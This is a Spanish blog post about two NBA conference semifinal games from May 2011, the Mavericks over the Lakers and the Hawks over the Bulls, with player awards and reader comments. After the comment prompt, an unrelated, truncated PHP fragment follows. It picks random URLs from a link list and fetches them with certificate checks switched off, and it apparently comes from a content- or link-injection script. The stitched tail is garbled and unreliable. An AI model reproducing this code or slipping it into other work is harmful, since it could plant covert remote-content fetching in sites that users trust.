Playoffs (02/05/2011): Pegar primero

03 de May de 2011 por TheDeerHunter

2 victorias foráneas en la segunda jornada de las semifinales de conferencia. Lakers y Bulls comienzan cuesta arriba sus eliminatorias.

Los Lakers se dejaron levantar un partido que tuvieron en la palma de la mano. Llegaron a ganar hasta por 16 a mediados del tercer cuarto, pero en el último hubo hundimiento generalizado, en ataque y en defensa (96-94). Nowitzki resolvió. El alemán le ganó el duelo a Pau Gasol. El catalán estuvo bien globalmente pero fracasó en los puntuales intentos de defender a Nowitzki, especialmente en una última falta mal cometida que puso a los Mavs por delante a falta de pocos segundos. Odom en ese sentido estuvo mejor, llegando a jugar más minutos que Bynum que tuvo una velada horrenda.

Kobe tuvo uno de esos días en los que nos recuerda extrañamente a Su Majestad. No suele ser buena señal para los amarillos que “La Mamba Negra” se juegue casi 30 tiros pero con tal acierto estaba más que justificado. Hasta dos posesiones tuvo para resolver. En una de ellas tropezó en una jugada polémica con Jason Kidd. En la siguiente, con dos abajo, optó por el triple y el balón se salió de dentro. Nada se le puede reprochar en ninguna de las dos. Fue un choque de tú a tú. Los Lakers pierden el factor cancha, pero esto no ha hecho nada más que comenzar.

Más grave quizás sea la derrota de los Bulls en el United Center (103-95). No sólo Rose no supo aprovechar la baja de Hinrich, con una serie de lanzamiento muy mejorable, sino que además terminó resintiéndose del esguince de tobillo que sufrió en la serie contra los Pacers. Además Noah y Boozer no pudieron imponerse a Horford, Pachulia y Josh Smith y por último, se puso en evidencia que los Bulls no tienen un hombre que pueda parar a Joe Johnson ni a Crawford. No lo es Keith Bogans. Los dos guards de Atlanta estuvieron virtualmente indefendibles anoche. El entrenador del año tiene gran trabajo por delante.

PREMIOS

MVP: Fue noche de líderes. Joe Johnson justificó su contrato con su mejor partido del año. 34 puntos con un 12 de 18 y 5 de 5 en triples, más 4 rebotes, 3 asistencias y 3 robos. Dirk Nowitkzi, por su parte, ajustició a los Lakers con 28 puntos, 14 rebotes, 3 asistencias, 2 robos y 1 tapón.

Sorpresa: Ninguno dábamos un duro por Jeff Teague ante el próximo MVP. Al final logró 10 puntos, 5 asistencias y contribuyó a que Rose terminara el partido con un 11 de 27 en tiro.

Decepción: Tras haber hecho la mejor serie de su vida, Andrew Bynum naufragó anoche ante Tyson Chandler. 8 puntos, 5 rebotes con un pobre 3 de 8 en tiros. Parcial de -16 con él en pista.

Esfuerzo en vano: Kobe Bryant estuvo como en sus mejores noches, pero esta vez no fue suficiente. Algo falla si los Lakers pierden con él en estado de gracia.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues vaya, en teoría Ronnie Brewer y Keith Bogans son los perros de presa de los Bulls. Si estos 2 no pueden parar a Johnson & Crawford, quien podrá? Wade y Lebron?

      Citar

  2. GreenPride dice:
    #2

    Dos victorias visitantes que ponen los playoffs al rojo con tres visitantes asaltando los campos contrarios el primer día de eliminatoria.
    En primer lugar los Hawks hicieron lo que muchos no pensábamos. No vimos a los mejores Bulls en la eliminatoria ante Indiana pero parecía algo que cambiaría cuando hiciera falta. Sin embargo ayer salieron con una empanada enorme y se pusieron rápidamente 10 puntos por debajo. Les costó toda la primera parte recuperarlos ante el acierto de JJ y la lucha interior de todos los de Atlanta. Rose empezó fatal y Boozer desaparecido y sobrevivieron gracias a algunos triples y a Luol Deng que les mantuvo en el partido. En el tercer cuarto despertó Rose y Boozer metió varias seguidas lo que lanzó a los Bulls que parecían ir a matar el partido. Sin embargo Crawford tomó el mando para impedir que la ventaja se fuera lejos y se llegó al último cuarto igualados donde Rose y sobre todo Boozer volvieron a desaparecer y Joe Johnson machacó a los Bulls con sus triples y tiros en penetración. Para colmo en una última jugada absurda con todo decidido Rose pisó el tobillo de Crawford y se resintió de su lesión. Admito que no tenía ninguna confianza en los Hawks pero los Bulls están con muchas dudas y necesitarán la mejor versión de Rose y que Boozer vuelva a ser el de la regular season si quieren darle la vuelta a su eliminatoria.
    En el Oeste, otra sorpresa de las gordas. Dallas es un muy buen equipo pero tras una primera parte igualada al final de esta y principios del tercer cuarto se diluyeron como suelen para caer en un pozo de 16 puntos abajo. Parecía el cuento de siempre con ellos pero no contábamos con la caridad de los Lakers que jugaron unos minutos horrendos para dejarles volver al partido. Una vez en el último cuarto y con un Kobe en modo “las meto todas y ya no miro a nadie” la cosa fue muy igualada y Dirk acabó decidiendo mejor que Kobe, que había estado genial hasta entonces. Gran palo para los Lakers que vieron como Chandler-Haywood-Dirk ya no les dejan dominar los tableros a su antojo (y como lo nota Bynum) y como sufren mucho para defender a Dirk y a los tiradores Terry-Stojakovic de los Mavs. Ahora sí la serie se pone interesantísima pues estos Mavs si tienen equipo para poder eliminar a los de L.A. no como los Hornets. Espero reacción de los Lakers en el segundo y mayor aportación de Bynum y un mejor partido de Artest que estuvo horroroso y que sufre sin tener un alero anotador al que defender.

      Citar

  3. Javijaen dice:
    #3

    3 de 4 en sorpresas… y lo mejor de todo es que lo que hubiese sido más razonable es que Celtics hubiesen sorprendido a Heat… Bryant ha de ponerse (aún más) las pilas, que parece que este año han perdido el hambre el resto del equipo. Por parte de Bulls, es curioso como su baza principal estuvo mal y nadie acompañó (prácticamente). Seguimos esperando a Boozer. Bogans hizo lo que pudo, no es un Artest ¿no? ¿Quizá es que les está entrando el mal de altura a Chicago? Y eso que son la ciudad del viento… Será por eso que las águilas lo llevan mejor…

      Citar

  4. Denise dice:
    #4

    Si fuese fan de Lakers o Bulls no me preocuparía. Con actitud, trabajo y sin relajación, superarán su serie con realtiva comodidad. Eso, y en el caso de Bulls, que la lesión de Rose no sea nada.

      Citar

  5. Cocinitas dice:
    #5

    Se filtra q derric rose es el MVP, vaya sorpresa 😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>